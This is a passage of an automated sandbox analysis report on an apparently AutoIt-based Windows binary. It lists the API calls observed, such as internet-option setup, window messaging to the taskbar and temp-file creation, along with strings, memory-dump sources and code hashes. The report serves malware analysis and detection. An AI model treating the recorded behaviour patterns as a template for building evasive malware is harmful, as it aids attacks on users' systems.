                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                                                  • String ID: edit
                                                                                                                  • API String ID: 2978978980-2167791130
                                                                                                                  • Opcode ID: 58a041dd69e932a2cfe5780b199008e5852e424c1d315546a7f391ca24406ed8
                                                                                                                  • Instruction ID: 25919b13eba2d7ec3079dcbb3d7aad3a470937c96b7dbe8ef8481d3d3c57de9c
                                                                                                                  • Opcode Fuzzy Hash: 58a041dd69e932a2cfe5780b199008e5852e424c1d315546a7f391ca24406ed8
                                                                                                                  • Instruction Fuzzy Hash: 7F11BF71100208AFEB109EA4DC50EFB7B6AEB05378F108726F965972E1C772DC529B74
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DB5CF3
                                                                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00DB5D12
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                  • Opcode ID: 9cacbbe0afa9a1ac1effe3db76126518b50ffb3fbc0613a4b59902ffbcbdfa3d
                                                                                                                  • Instruction ID: db31a5f8e6429f667a54824738057d6e1dad9a458d6bd181bf8bc47aa77d67ea
                                                                                                                  • Opcode Fuzzy Hash: 9cacbbe0afa9a1ac1effe3db76126518b50ffb3fbc0613a4b59902ffbcbdfa3d
                                                                                                                  • Instruction Fuzzy Hash: 35119072901618EBDB20EB59F848BD97BFAAB06344F180165ED46EB298D371ED04C7B1
                                                                                                                  APIs
                                                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00DC544C
                                                                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00DC5475
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$OpenOption
                                                                                                                  • String ID: <local>
                                                                                                                  • API String ID: 942729171-4266983199
                                                                                                                  • Opcode ID: e9e224df5c9ab98011a081eccfa557cc088716c56878c647394093a7ad8630a9
                                                                                                                  • Instruction ID: 54ccb4a03c9449c081ddcf66e59225ea3b1f7dbdb3579b1bb82370e601c3d517
                                                                                                                  • Opcode Fuzzy Hash: e9e224df5c9ab98011a081eccfa557cc088716c56878c647394093a7ad8630a9
                                                                                                                  • Instruction Fuzzy Hash: E1119170145A22BADB198F51AC84FFBFAA9EF12752F10812EF54597044E370A9C0CAB0
                                                                                                                  APIs
                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00DA4557
                                                                                                                  • ___raise_securityfailure.LIBCMT ref: 00DA463E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                  • String ID: (
                                                                                                                  • API String ID: 3761405300-2982846942
                                                                                                                  • Opcode ID: 359b539255a59232933c2e122f64a162ee5ea48fd53cbc4e346fde0aa0d51939
                                                                                                                  • Instruction ID: 189e53728c90d38ec7302e6aa4dd770d1293dc5ff602c713f5164b11754136c6
                                                                                                                  • Opcode Fuzzy Hash: 359b539255a59232933c2e122f64a162ee5ea48fd53cbc4e346fde0aa0d51939
                                                                                                                  • Instruction Fuzzy Hash: 442123B5600208DFDB10DF57F9A96403FF4BB49314F54586AE508AB3A0E3F1A988CF45
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: htonsinet_addr
                                                                                                                  • String ID: 255.255.255.255
                                                                                                                  • API String ID: 3832099526-2422070025
                                                                                                                  • Opcode ID: b2e2c7c969255cd0f5d164251abd414f008adef1a394a11fb1eb260de753df85
                                                                                                                  • Instruction ID: 3d12024bf98a2f0d09d4b4f6a1174913f0aa1739b9b234a9f0c8d271c52223a5
                                                                                                                  • Opcode Fuzzy Hash: b2e2c7c969255cd0f5d164251abd414f008adef1a394a11fb1eb260de753df85
                                                                                                                  • Instruction Fuzzy Hash: 1A01D27420030AABCB10AFA8D846FADB365EF44728F20851AF5179B2D1E671E804C776
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00DAC5E5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend_memmove
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 1456604079-1403004172
                                                                                                                  • Opcode ID: df6b6592e79976c5689b48f411ff7e43808d70f09fed3ae081fe39ab4b053e52
                                                                                                                  • Instruction ID: b0a0049db5a5f060159766695d676296e90730cd14e86c5ed28fa9860dca56f3
                                                                                                                  • Opcode Fuzzy Hash: df6b6592e79976c5689b48f411ff7e43808d70f09fed3ae081fe39ab4b053e52
                                                                                                                  • Instruction Fuzzy Hash: E601B571611218ABCB09EBA8CC529FE736AEB433217145A19F462E72D1EA70A9089770
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __fread_nolock_memmove
                                                                                                                  • String ID: EA06
                                                                                                                  • API String ID: 1988441806-3962188686
                                                                                                                  • Opcode ID: d47c09b43ac8557eab6b60ec4e90ee7f8d8d5febfe5997c292e7c3427274b0f1
                                                                                                                  • Instruction ID: 8319a83f61a85e248b24e7fc73a28b8953f96d4be274abe4f7cdfe3ce33f3bc5
                                                                                                                  • Opcode Fuzzy Hash: d47c09b43ac8557eab6b60ec4e90ee7f8d8d5febfe5997c292e7c3427274b0f1
                                                                                                                  • Instruction Fuzzy Hash: 2501B572904258AEDB28D7A8C856EFE7BF8DB15711F00415AE197D6181E5B4E7088B70
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00DAC4E1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend_memmove
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 1456604079-1403004172
                                                                                                                  • Opcode ID: 6eb95d4d30b0f5f720594d7b06072b2d617fbf510e48e6317d9619ff48dc7f08
                                                                                                                  • Instruction ID: 12347eb0dad9cb2a57a9d74415a123097deaed729062e86fa3f8321ab19ff4a5
                                                                                                                  • Opcode Fuzzy Hash: 6eb95d4d30b0f5f720594d7b06072b2d617fbf510e48e6317d9619ff48dc7f08
                                                                                                                  • Instruction Fuzzy Hash: F701A271651208ABCB05EBA4C963EFF73A9DF16701F145029F543F32C1EA94AE0896B5
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00DAC562
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend_memmove
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 1456604079-1403004172
                                                                                                                  • Opcode ID: e06c343fdd8b0fdccb1a710bc8cfc2af49dd7586c752e89c8bdd1770912ae67a
                                                                                                                  • Instruction ID: 8e06149600d468b3f607c4b4f11eed57efcde8cf248509db36fd1c4a7b79e1ea
                                                                                                                  • Opcode Fuzzy Hash: e06c343fdd8b0fdccb1a710bc8cfc2af49dd7586c752e89c8bdd1770912ae67a
                                                                                                                  • Instruction Fuzzy Hash: 3201A271A51208ABCB05EBA4C952EFF73AD9B12701F145119F507F3181EA549E099271
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassName_wcscmp
                                                                                                                  • String ID: #32770
                                                                                                                  • API String ID: 2292705959-463685578
                                                                                                                  • Opcode ID: 548406150fe60f65125df3851383d7cee7800c13ef9d6f086636fb53dada4546
                                                                                                                  • Instruction ID: 09ed7d34425cec3893ef32da9d9b4333ae0fc667648e7a4eaa44fde719895fcd
                                                                                                                  • Opcode Fuzzy Hash: 548406150fe60f65125df3851383d7cee7800c13ef9d6f086636fb53dada4546
                                                                                                                  • Instruction Fuzzy Hash: FCE0923760032966D720EBA6AC0AE96FBADEB517A4F000026A925E3141D664964587E4
                                                                                                                  APIs
                                                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00DAB36B
                                                                                                                    • Part of subcall function 00D92011: _doexit.LIBCMT ref: 00D9201B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message_doexit
                                                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                                                  • API String ID: 1993061046-4017498283
                                                                                                                  • Opcode ID: 513d517bc9bda258f96ef340b683ea9179ce3bfc839763848e152bfb961c5cbf
                                                                                                                  • Instruction ID: e604465f339119c08edead3d8d5fd691c6b40ef3794bb861355ff597706a591a
                                                                                                                  • Opcode Fuzzy Hash: 513d517bc9bda258f96ef340b683ea9179ce3bfc839763848e152bfb961c5cbf
                                                                                                                  • Instruction Fuzzy Hash: 5DD0123128831832D61532A47C07FD576888F05B51F054416BF0CA61C28AD294C092B9
                                                                                                                  APIs
                                                                                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 00DEBAB8
                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00DEBCAB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DirectoryFreeLibrarySystem
                                                                                                                  • String ID: WIN_XPe
                                                                                                                  • API String ID: 510247158-3257408948
                                                                                                                  • Opcode ID: e7b7d063b43388fa7941789d62a171ce1c23a0a27a3e0190e3a349f2fc38f780
                                                                                                                  • Instruction ID: b7701cd60f1ca5437eccd44d9ed71edbd9a3fcc449cf4fc106088dc2c86707b5
                                                                                                                  • Opcode Fuzzy Hash: e7b7d063b43388fa7941789d62a171ce1c23a0a27a3e0190e3a349f2fc38f780
                                                                                                                  • Instruction Fuzzy Hash: 6CE0C070C0424DEFCF15EBA6D885AEDB7B9BB08304F24C456E162B2150C7719944DF35
                                                                                                                  APIs
                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DD84DF
                                                                                                                  • PostMessageW.USER32(00000000), ref: 00DD84E6
                                                                                                                    • Part of subcall function 00DB8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00DB83CD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                  • Opcode ID: 102a7f8f6e7075a940be514b36217c23c075b908cf27300cb28313d45a4b684a
                                                                                                                  • Instruction ID: e9cbcd421046dc5fabe2983721048cb9ebdca4f69e473f9b87f8c01f705d3042
                                                                                                                  • Opcode Fuzzy Hash: 102a7f8f6e7075a940be514b36217c23c075b908cf27300cb28313d45a4b684a
                                                                                                                  • Instruction Fuzzy Hash: E5D0C972384314BBE765A770AC4BFD6765AAB18B11F044929764AEA2D0C9A4B800CA74
                                                                                                                  APIs
                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DD849F
                                                                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00DD84B2
                                                                                                                    • Part of subcall function 00DB8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00DB83CD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                  • Opcode ID: edddb4720afaf72529bfdb812533e5922516024ba8704e886cdbbd01e21141ad
                                                                                                                  • Instruction ID: 354830e53efd67a9324149c78a23b2b8a6d77ea736e6d95cfaf73aa16ce59d7a
                                                                                                                  • Opcode Fuzzy Hash: edddb4720afaf72529bfdb812533e5922516024ba8704e886cdbbd01e21141ad
                                                                                                                  • Instruction Fuzzy Hash: F8D0C972384314B7E764A770AC4BFE67A5AAB14B11F044929764AEA2D0C9A4B800CA70
                                                                                                                  APIs
                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00DBD01E
                                                                                                                  • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00DBD035
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Temp$FileNamePath
                                                                                                                  • String ID: aut
                                                                                                                  • API String ID: 3285503233-3010740371
                                                                                                                  • Opcode ID: 9375f9bdaf72f476ae8d55cdbcfdeca324d4ff773e8a21cbfa1b3a1e7b9cb7c5
                                                                                                                  • Instruction ID: c7b1aa6d07987969166c187cdf578a2558b5e838c01ced4f0d435c1d466cb704
                                                                                                                  • Opcode Fuzzy Hash: 9375f9bdaf72f476ae8d55cdbcfdeca324d4ff773e8a21cbfa1b3a1e7b9cb7c5
                                                                                                                  • Instruction Fuzzy Hash: B8D05EB154030EBBDB10ABA0ED0EFA9776DA700704F1081907614E50D1D2B4D685CBA4